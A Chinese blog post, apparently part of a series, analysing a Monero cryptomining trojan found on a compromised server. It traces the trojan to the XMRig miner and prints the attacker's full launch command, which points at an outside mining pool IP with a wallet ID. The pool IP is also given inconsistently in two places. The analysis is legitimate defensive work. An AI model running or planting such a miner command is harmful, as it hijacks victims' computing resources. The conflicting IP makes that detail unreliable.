挖矿分析-2

今天接着对这个进行分析，由于经验不足，没有对其log文件进行深入研究，昨天给那个md(挖矿木马)给了同事，然后他告诉我确定是个XMR(门罗币)挖矿，然后发送了一张图给我

注意到这个地址:fee.xmrig.com:443

我们对其google一下:

再次确定了这个XMRIG是个XMR的CPU矿工，然后我们继续查找，在github上发现这个XMRIG是个开源挖矿工具，C++写的

地址是:https://github.com/xmrig/xmrig#usage

我们把这个挖矿工具先下载到我们的服务器上

git clone https://github.com/xmrig/xmrig.git

对其编译，运行，这里先暂停一下

我们把注意力放到XMRIG这个挖矿工具的一个配置文件config.json

可以知道黑客挖矿的话所有的门罗币都是通过"url": "failover.xmrig.com:443"这个矿池来处理。

再次回到之前的受害服务器的log文件，定位到所有的md文件的命令操作，发现一条重要命令，通过查询发现，这条命令是运行md挖矿木马的命令

使用那条命令，我们将其md文件拷贝到本机的kali下面进行分析

通过查询该ip地址115.234.218.70，地点是爱尔兰,就是矿池的ip

接下来，我们重点分析一下之前的那条命令

 ./md --cpu-affinity=0xFFFFFFFF --cpu-priority=5 --max-cpu-usage=90 --donate-level=1 --nicehash -o stratum+tcp://185.234.218.70:80 -u 9b270a4a353480ceb04c8bbe879f66 -p x -k

-cpu-affinity=0xFFFFFFFF --cpu-priority=5 --max-cpu-usage=90，这几个都是cpu配置参数，我们不管，--donate-level=1，这个--donate-level是默认捐赠比例，XMRIG软件默认的捐赠是 5 %,最低为 1 % ，--nicehash -o stratum+tcp://185.234.218.70:80 ，这个是矿场配置。stratum是一种服务器的覆盖协议，-u 9b270a4a353480ceb04c8bbe879f66，这个比较重要，指向的是黑客的XMR钱包（我们可以篡改他的钱包地址哈哈）

我们现在最关心的事情就是黑客的ip地址，然后社工一波黑客，嘿嘿，坐等接下来的分析把...

这里我补充一下门罗币挖矿流程:

参考链接:

https://mp.weixin.qq.com/s?__biz=MzAwMTUwNDMwMQ==&mid=305803785&idx=1&sn=947011819671cb989f3866d3aa6f22b2&mpshare=1&scene=1&srcid=04274nmPA3dpwY3NnGZPOF4B#rd

https://blog.csdn.net/xiao_tata/article/details/78888782

https://en.bitcoin.it/wiki/Stratum

https://www.nicehash.com/?lang=zh

https://github.com/xmrig/xmrig